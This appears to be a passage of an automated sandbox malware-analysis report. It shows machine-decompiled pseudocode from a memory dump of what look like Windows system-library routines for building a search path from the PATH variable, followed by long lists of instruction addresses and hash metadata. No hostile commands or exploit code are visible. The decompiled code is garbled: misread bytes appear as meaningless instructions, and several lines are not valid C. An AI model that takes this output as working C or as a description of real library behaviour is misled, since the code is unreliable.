								__eflags = _t311 - 0x37b8478;
								 *_t329 = ((0 | _t311 == 0x037b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0370F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t343 = _t343 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E037539F2(_t324);
									_t311 = _v32;
									_t324 = _t273;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t283 = _t329 + _t281 * 4;
								_v56 = _t283;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t238 =  *(_v60 + _t295 * 4);
										__eflags = _t238;
										if(_t238 == 0) {
											goto L30;
										} else {
											__eflags = _t238 == 5;
											if(_t238 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t283 =  *(_v60 + _t295 * 4);
										 *(_t283 + 0x18) = _t324;
										_t242 =  *(_v60 + _t295 * 4);
										__eflags = _t242 - 8;
										if(_t242 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t242 * 4 +  &M036F2959))) {
												case 0:
													__ax =  *0x37b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0370F3E0(__edi,  *0x37b848c, __ax & 0x0000ffff);
														__eax =  *0x37b8488 & 0x0000ffff;
														goto L26;
													}
													goto L114;
												case 1:
													L45:
													E0370F3E0(_t324, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x37b8480 & 0x0000ffff = E0370F3E0(__edi,  *0x37b8484,  *0x37b8480 & 0x0000ffff);
													__eax =  *0x37b8480 & 0x0000ffff;
													__eax = ( *0x37b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0370F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L114;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0370F3E0(_t324, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t324 = _t324 + (_t268 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t324 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x37b575c;
													__eflags = __ebx - 0x37b575c;
													if(__ebx != 0x37b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0370F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x37b575c;
														} while (__ebx != 0x37b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x37b8478 & 0x0000ffff = E0370F3E0(__edi,  *0x37b847c,  *0x37b8478 & 0x0000ffff);
													__eax =  *0x37b8478 & 0x0000ffff;
													__eax = ( *0x37b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E037539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x37b6e58 & 0x0000ffff = E0370F3E0(__edi,  *0x37b6e5c,  *0x37b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x37b6e58 & 0x0000ffff;
													__eax = ( *0x37b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t283 = _t283 + 4;
													__eflags = _t283;
													_v56 = _t283;
													goto L30;
											}
										}
									}
									goto L114;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t242 =  *(_v60 + _t322 * 4);
						if(_t242 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t242 * 4 +  &M036F2935))) {
							case 0:
								__ax =  *0x37b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E036F2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x37b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x37b8480;
									goto L86;
								}
								goto L14;
							case 3:
								__eax = E036DEEF0(0x37b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L63();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E036DEB70(__ecx, 0x37b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t216 = _v72;
											__eflags = _t216;
											if(_t216 != 0) {
												L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
											}
											_t217 = _v52;
											__eflags = _t217;
											if(_t217 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
													_t217 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x37b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E036DEB70(__ecx, 0x37b79a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t338;
										_pop(_t280);
										return E0370B640(_t217, _t280, _v8 ^ _t338, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L63();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L114;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t277 = E036F2E3E(_t275,  &_v36);
									_t291 = _v36;
									_v76 = _t277;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x37b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x37b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x37b8478;
									L86:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x37b6e58 & 0x0000ffff;
								__eax = ( *0x37b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L114;
						}
					}
					L56:
					_t296 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("outsd");
					asm("outsd");
					_t346 = _t343 +  *((intOrPtr*)(_t329 + 0x28)) + _t242;
					asm("daa");
					asm("outsd");
					_t340 = _t338 +  *_t329;
					asm("es outsd");
					asm("outsd");
					_t244 = _t242 +  *((intOrPtr*)(_t329 + 0x28)) +  *0x1f036f26;
					__eflags = _t244;
					_pop(_t284);
					if(_t244 < 0) {
						_t107 = _t244;
						_t244 = _t346;
						_t346 = _t107;
						_t108 = _t324 + 3;
						 *_t108 =  *(_t324 + 3) - _t296;
						__eflags =  *_t108;
					}
					 *(_t324 + 3) =  *(_t324 + 3) - _t340;
					 *_t244 =  *_t244 - 0x6f;
					_t333 = _t329 +  *0x203735b + _t329 +  *0x203735b;
					asm("daa");
					asm("outsd");
					 *(_t324 + 3) =  *(_t324 + 3) - _t296;
					_t334 = _t333 - 1;
					 *(_t324 + 3) =  *(_t324 + 3) - _t296;
					asm("daa");
					asm("outsd");
					__eflags = _t284 +  *_t333 + _t244;
					_pop(_t287);
					if(_t284 +  *_t333 + _t244 < 0) {
						asm("outsd");
					}
					_t335 = _t334 +  *((intOrPtr*)(_t346 + _t287 * 2));
					__eflags = _t334 +  *((intOrPtr*)(_t346 + _t287 * 2));
					if(_t334 +  *((intOrPtr*)(_t346 + _t287 * 2)) < 0) {
						asm("int3");
						asm("int3");
						asm("int3");
					}
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x379ff00);
					E0371D08C(_t287, _t324, _t335);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t301 = _t249 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x36a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0370E5C0(_a8,  *((intOrPtr*)(_t301 + 0x36a1668)), _t288);
									_t346 = _t346 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t336 = E037451BE(_t288,  *((intOrPtr*)(_v48 + 0x36a166c)), _a16, _t325, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t249 = _v40;
										goto L68;
									}
									goto L76;
								} else {
									L68:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t325;
									if( *_t297 == _t325) {
										_t336 = 0xc0000100;
										goto L82;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L112:
												_t336 = E036F2AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L75;
												} else {
													_t325 = 1;
													_t297 = _v36;
													goto L81;
												}
											} else {
												_t254 = E036D6600( *(_t313 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L112;
												} else {
													_t297 = _a4;
													goto L81;
												}
											}
										} else {
											L81:
											_t336 = E036F2C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
											L82:
											_v32 = _t336;
											goto L75;
										}
									}
									goto L114;
								} else {
									E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t261 = E036F2AE4( &_v36, _a8, _t288, _a16, _a20, _t336);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E036F2C50(_v36, _a8, _t288, _a16, _a20, _t336, 1);
									}
									_v8 = _t325;
									E036F2ACB();
								}
							}
						}
						L75:
						_v8 = 0xfffffffe;
						_t247 = _t336;
					}
					L76:
					return E0371D0D1(_t247);
				}
				L114:
			}

























































                                      0x036f2584
                                      0x036f2586
                                      0x036f2590
                                      0x036f2596
                                      0x036f2597
                                      0x036f2598
                                      0x036f2599
                                      0x036f259e
                                      0x036f25a4
                                      0x036f25a9
                                      0x036f25ac
                                      0x036f25ae
                                      0x036f25b1
                                      0x036f25b2
                                      0x036f25b5
                                      0x036f25b8
                                      0x036f25bb
                                      0x036f25bc
                                      0x036f25bf
                                      0x036f25c2
                                      0x036f25c5
                                      0x036f25c6
                                      0x036f25cb
                                      0x036f25ce
                                      0x036f25d8
                                      0x036f25db
                                      0x036f25dd
                                      0x036f25de
                                      0x036f25e1
                                      0x036f25e3
                                      0x036f25e9
                                      0x036f26da
                                      0x036f26da
                                      0x036f26dd
                                      0x036f26e2
                                      0x03735b56
                                      0x00000000
                                      0x036f26e8
                                      0x036f26f9
                                      0x036f26fb
                                      0x036f26fe
                                      0x036f2700
                                      0x03735b60
                                      0x00000000
                                      0x036f2706
                                      0x036f2706
                                      0x036f270a
                                      0x036f270a
                                      0x036f270d
                                      0x036f2713
                                      0x036f2716
                                      0x036f2718
                                      0x036f271c
                                      0x036f271e
                                      0x03735b6c
                                      0x03735b6f
                                      0x03735b7f
                                      0x03735b89
                                      0x03735b8e
                                      0x03735b93
                                      0x03735b96
                                      0x03735b9c
                                      0x03735ba0
                                      0x03735ba3
                                      0x03735bab
                                      0x03735bb0
                                      0x03735bb3
                                      0x03735bb3
                                      0x03735ba3
                                      0x036f2724
                                      0x036f2726
                                      0x036f2729
                                      0x036f272c
                                      0x036f279d
                                      0x036f279d
                                      0x036f27a0
                                      0x036f27a2
                                      0x00000000
                                      0x036f272e
                                      0x036f272e
                                      0x036f2731
                                      0x036f2734
                                      0x036f2734
                                      0x036f2736
                                      0x03735bc1
                                      0x03735bc1
                                      0x03735bc4
                                      0x00000000
                                      0x03735bca
                                      0x03735bca
                                      0x03735bcd
                                      0x00000000
                                      0x03735bd3
                                      0x00000000
                                      0x03735bd3
                                      0x03735bcd
                                      0x036f273c
                                      0x036f273c
                                      0x036f2742
                                      0x036f2747
                                      0x036f274a
                                      0x036f274d
                                      0x036f2750
                                      0x00000000
                                      0x036f2756
                                      0x036f2756
                                      0x00000000
                                      0x036f2902
                                      0x036f2908
                                      0x036f290b
                                      0x00000000
                                      0x036f2911
                                      0x036f291c
                                      0x036f2921
                                      0x00000000
                                      0x036f2921
                                      0x00000000
                                      0x00000000
                                      0x036f2880
                                      0x036f2887
                                      0x036f288c
                                      0x00000000
                                      0x00000000
                                      0x036f2805
                                      0x036f280a
                                      0x036f2814
                                      0x036f2816
                                      0x00000000
                                      0x00000000
                                      0x036f281e
                                      0x036f2821
                                      0x036f2823
                                      0x00000000
                                      0x036f2829
                                      0x036f2829
                                      0x036f2831
                                      0x036f283c
                                      0x036f283e
                                      0x00000000
                                      0x036f283e
                                      0x00000000
                                      0x00000000
                                      0x036f284e
                                      0x036f2850
                                      0x036f2851
                                      0x036f2854
                                      0x036f2857
                                      0x036f285a
                                      0x036f285c
                                      0x036f285d
                                      0x00000000
                                      0x00000000
                                      0x036f275d
                                      0x036f2761
                                      0x00000000
                                      0x036f2767
                                      0x036f276e
                                      0x036f2773
                                      0x036f2773
                                      0x036f2776
                                      0x036f2778
                                      0x036f277e
                                      0x036f277e
                                      0x036f2781
                                      0x036f2781
                                      0x036f2783
                                      0x036f2784
                                      0x00000000
                                      0x00000000
                                      0x03735bd8
                                      0x03735bde
                                      0x03735be4
                                      0x03735be6
                                      0x03735be8
                                      0x03735be9
                                      0x03735bee
                                      0x03735bf8
                                      0x03735bff
                                      0x03735c01
                                      0x03735c04
                                      0x03735c07
                                      0x03735c0b
                                      0x03735c0d
                                      0x03735c0d
                                      0x03735c15
                                      0x03735c18
                                      0x03735c1b
                                      0x03735c1b
                                      0x03735c1e
                                      0x00000000
                                      0x00000000
                                      0x036f28c3
                                      0x036f28c8
                                      0x036f28d2
                                      0x036f28d4
                                      0x036f28d8
                                      0x036f28db
                                      0x03735c26
                                      0x03735c28
                                      0x03735c2d
                                      0x03735c2d
                                      0x00000000
                                      0x00000000
                                      0x03735c34
                                      0x03735c36
                                      0x03735c49
                                      0x03735c4e
                                      0x03735c54
                                      0x03735c5b
                                      0x03735c5d
                                      0x03735c60
                                      0x036f2788
                                      0x036f2788
                                      0x036f278b
                                      0x036f278e
                                      0x036f278e
                                      0x036f278e
                                      0x036f2791
                                      0x00000000
                                      0x00000000
                                      0x036f2756
                                      0x036f2750
                                      0x00000000
                                      0x036f2794
                                      0x036f2794
                                      0x036f2795
                                      0x036f2798
                                      0x036f2798
                                      0x00000000
                                      0x036f2734
                                      0x036f272c
                                      0x036f2700
                                      0x036f25ef
                                      0x036f25ef
                                      0x036f25ef
                                      0x036f25f2
                                      0x036f25f8
                                      0x00000000
                                      0x00000000
                                      0x036f25fe
                                      0x00000000
                                      0x036f28e6
                                      0x036f28ec
                                      0x036f28ef
                                      0x036f28f5
                                      0x036f28f8
                                      0x036f28f8
                                      0x00000000
                                      0x036f28f8
                                      0x00000000
                                      0x00000000
                                      0x036f2866
                                      0x036f2866
                                      0x036f2876
                                      0x036f2879
                                      0x00000000
                                      0x00000000
                                      0x036f27e0
                                      0x036f27e7
                                      0x036f27e9
                                      0x036f27eb
                                      0x03735afd
                                      0x00000000
                                      0x03735afd
                                      0x00000000
                                      0x00000000
                                      0x036f2633
                                      0x036f2638
                                      0x036f263b
                                      0x036f263c
                                      0x036f263e
                                      0x036f2640
                                      0x036f2642
                                      0x036f2647
                                      0x036f2649
                                      0x036f264e
                                      0x036f2650
                                      0x036f2653
                                      0x036f2659
                                      0x036f26a2
                                      0x036f26a7
                                      0x036f26ac
                                      0x036f26b2
                                      0x03735b11
                                      0x03735b15
                                      0x03735b17
                                      0x00000000
                                      0x036f26b8
                                      0x036f26b8
                                      0x036f26ba
                                      0x036f27a6
                                      0x036f27a6
                                      0x036f27a9
                                      0x036f27ab
                                      0x036f27b9
                                      0x036f27b9
                                      0x036f27be
                                      0x036f27c1
                                      0x036f27c3
                                      0x036f27c5
                                      0x036f27c7
                                      0x03735c74
                                      0x03735c79
                                      0x03735c79
                                      0x036f27c7
                                      0x00000000
                                      0x036f26c0
                                      0x036f26c0
                                      0x036f26c3
                                      0x036f26c6
                                      0x036f26c6
                                      0x036f26c9
                                      0x036f26c9
                                      0x00000000
                                      0x036f26c9
                                      0x036f26ba
                                      0x036f265b
                                      0x036f265b
                                      0x036f265e
                                      0x036f2667
                                      0x036f266d
                                      0x036f2677
                                      0x036f267c
                                      0x036f267f
                                      0x036f2681
                                      0x03735b49
                                      0x03735b4e
                                      0x036f27cd
                                      0x036f27d0
                                      0x036f27d1
                                      0x036f27d2
                                      0x036f27d4
                                      0x036f27dd
                                      0x036f2687
                                      0x036f2687
                                      0x036f268a
                                      0x036f268b
                                      0x036f268e
                                      0x036f268f
                                      0x036f2691
                                      0x036f2696
                                      0x036f2698
                                      0x036f269d
                                      0x036f269f
                                      0x00000000
                                      0x036f269f
                                      0x036f2681
                                      0x00000000
                                      0x00000000
                                      0x036f2846
                                      0x00000000
                                      0x00000000
                                      0x036f2605
                                      0x036f260a
                                      0x036f260c
                                      0x036f2611
                                      0x036f2616
                                      0x036f2619
                                      0x036f2619
                                      0x036f261e
                                      0x00000000
                                      0x036f2624
                                      0x036f2627
                                      0x036f2627
                                      0x00000000
                                      0x00000000
                                      0x03735b1f
                                      0x00000000
                                      0x00000000
                                      0x036f2894
                                      0x036f289b
                                      0x036f289d
                                      0x036f28a1
                                      0x03735b2b
                                      0x03735b2e
                                      0x03735b2e
                                      0x036f28a7
                                      0x036f28a9
                                      0x03735b04
                                      0x03735b09
                                      0x03735b09
                                      0x03735b09
                                      0x00000000
                                      0x00000000
                                      0x03735b35
                                      0x03735b3c
                                      0x036f28fb
                                      0x036f28fb
                                      0x036f26cc
                                      0x036f26cc
                                      0x036f26d0
                                      0x00000000
                                      0x036f26d2
                                      0x036f26d2
                                      0x00000000
                                      0x036f26d2
                                      0x00000000
                                      0x00000000
                                      0x036f25fe
                                      0x036f292d
                                      0x036f292f
                                      0x036f2930
                                      0x036f2935
                                      0x036f2937
                                      0x036f293b
                                      0x036f293c
                                      0x036f293e
                                      0x036f293f
                                      0x036f2940
                                      0x036f2942
                                      0x036f2947
                                      0x036f2948
                                      0x036f2948
                                      0x036f294e
                                      0x036f294f
                                      0x036f2951
                                      0x036f2951
                                      0x036f2951
                                      0x036f2952
                                      0x036f2952
                                      0x036f2952
                                      0x036f2952
                                      0x036f295a
                                      0x036f295d
                                      0x036f2960
                                      0x036f2962
                                      0x036f2963
                                      0x036f2966
                                      0x036f2969
                                      0x036f296a
                                      0x036f296e
                                      0x036f296f
                                      0x036f2970
                                      0x036f2972
                                      0x036f2973
                                      0x036f2977
                                      0x036f2977
                                      0x036f2978
                                      0x036f2978
                                      0x036f297b
                                      0x036f297d
                                      0x036f297e
                                      0x036f297f
                                      0x036f297f
                                      0x036f2980
                                      0x036f2981
                                      0x036f2982
                                      0x036f2983
                                      0x036f2984
                                      0x036f2985
                                      0x036f2986
                                      0x036f2987
                                      0x036f2988
                                      0x036f2989
                                      0x036f298a
                                      0x036f298b
                                      0x036f298c
                                      0x036f298d
                                      0x036f298e
                                      0x036f298f
                                      0x036f2990
                                      0x036f2992
                                      0x036f2997
                                      0x036f29a3
                                      0x036f29a6
                                      0x036f29ab
                                      0x036f29ad
                                      0x036f29b0
                                      0x036f29b2
                                      0x03735c80
                                      0x036f29b8
                                      0x036f29b8
                                      0x036f29bb
                                      0x036f29c0
                                      0x036f29c5
                                      0x036f29c6
                                      0x036f29c6
                                      0x036f29c9
                                      0x036f29cb
                                      0x00000000
                                      0x00000000
                                      0x036f29cd
                                      0x036f29d0
                                      0x036f29d9
                                      0x036f29db
                                      0x036f29dd
                                      0x036f2a7f
                                      0x036f2a84
                                      0x036f2a87
                                      0x036f2a89
                                      0x03735ca1
                                      0x03735ca3
                                      0x00000000
                                      0x036f2a8f
                                      0x036f2a8f
                                      0x00000000
                                      0x036f2a8f
                                      0x00000000
                                      0x036f29e3
                                      0x036f29e3
                                      0x036f29e3
                                      0x00000000
                                      0x036f29e3
                                      0x036f29dd
                                      0x00000000
                                      0x036f29db
                                      0x036f29e6
                                      0x036f29e9
                                      0x036f29eb
                                      0x036f29ed
                                      0x036f29f3
                                      0x036f29f5
                                      0x036f29f8
                                      0x036f29fa
                                      0x036f2a97
                                      0x036f2a9a
                                      0x036f2a9d
                                      0x036f2add
                                      0x00000000
                                      0x036f2a9f
                                      0x036f2aa2
                                      0x036f2aa5
                                      0x036f2aa8
                                      0x036f2aab
                                      0x03735cab
                                      0x03735caf
                                      0x03735cc5
                                      0x03735cda
                                      0x03735cdc
                                      0x03735cdf
                                      0x03735ce5
                                      0x00000000
                                      0x03735ceb
                                      0x03735ced
                                      0x03735cee
                                      0x00000000
                                      0x03735cee
                                      0x03735cb1
                                      0x03735cb4
                                      0x03735cb9
                                      0x03735cbb
                                      0x00000000
                                      0x03735cbd
                                      0x03735cbd
                                      0x00000000
                                      0x03735cbd
                                      0x03735cbb
                                      0x036f2ab1
                                      0x036f2ab1
                                      0x036f2ac4
                                      0x036f2ac6
                                      0x036f2ac6
                                      0x00000000
                                      0x036f2ac6
                                      0x036f2aab
                                      0x00000000
                                      0x036f2a00
                                      0x036f2a09
                                      0x036f2a0e
                                      0x036f2a21
                                      0x036f2a24
                                      0x036f2a35
                                      0x036f2a3a
                                      0x036f2a3d
                                      0x036f2a42
                                      0x036f2a59
                                      0x036f2a59
                                      0x036f2a5c
                                      0x036f2a5f
                                      0x036f2a5f
                                      0x036f29fa
                                      0x036f29f3
                                      0x036f2a64
                                      0x036f2a64
                                      0x036f2a6b
                                      0x036f2a6b
                                      0x036f2a6d
                                      0x036f2a72
                                      0x036f2a72
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: PATH
                                      • API String ID: 0-1036084923
                                      • Opcode ID: 102d597ea9a3cd785f3df075141143600c2566dec9922a799386c0be5ccdcaf0
                                      • Instruction ID: b6d419e244e20db36f39b15277959e1530a3b2ad7f5461d7dd79eeafe244f7f0
                                      • Opcode Fuzzy Hash: 102d597ea9a3cd785f3df075141143600c2566dec9922a799386c0be5ccdcaf0
                                      • Instruction Fuzzy Hash: 59C1A2B9E00219EFCB14DFA9D994BAEF7B5FF48710F184429E501AB290D734A942CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E036FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E036DEEF0(0x37b7b60);
					_t134 =  *0x37b7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x37b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x37b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E036D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E036D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
